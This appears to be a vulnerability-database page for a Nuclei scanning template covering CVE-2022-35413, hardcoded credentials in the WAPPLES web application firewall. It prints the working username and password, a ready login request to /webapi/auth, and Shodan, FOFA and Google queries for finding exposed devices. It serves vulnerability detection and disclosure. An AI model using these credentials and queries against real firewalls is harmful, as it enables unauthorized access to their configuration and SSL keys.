Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-35413
HistorySep 14, 2022 - 4:04 a.m.

WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials

2022-09-1404:04:03
ProjectDiscovery
github.com
10

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.799 High

EPSS

Percentile

98.3%

WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
id: CVE-2022-35413

info:
  name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials
  author: For3stCo1d
  severity: critical
  description: |
    WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall.
  remediation: |
    Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability.
  reference:
    - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
    - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35413
    - https://www.pentasecurity.com/product/wapples/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-35413
    cwe-id: CWE-798
    epss-score: 0.72077
    epss-percentile: 0.97989
    cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: pentasecurity
    product: wapples
    shodan-query:
      - http.title:"Intelligent WAPPLES"
      - http.title:"intelligent wapples"
    fofa-query: title="intelligent wapples"
    google-query: intitle:"intelligent wapples"
  tags: cve,cve2022,wapples,firewall,default-login,pentasecurity

http:
  - raw:
      - |
        POST /webapi/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id={{username}}&password={{password}}

    payloads:
      username:
        - systemi
      password:
        - db/wp.no1
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"res_msg":"Authentication Success."'
          - '"doc_id":"user_systemi"'
        condition: and

      - type: word
        part: header
        words:
          - WP_SESSID=

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009425862b431fdb65b5a0f3cda5634d432e23b85eeee0de1801603d9843f0f0db02201d0d959b463eb2abb9693dc4d3eb1b4c1eba26ccf4431dc0210cece8f06fe70a:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.799 High

EPSS

Percentile

98.3%

Related for NUCLEI:CVE-2022-35413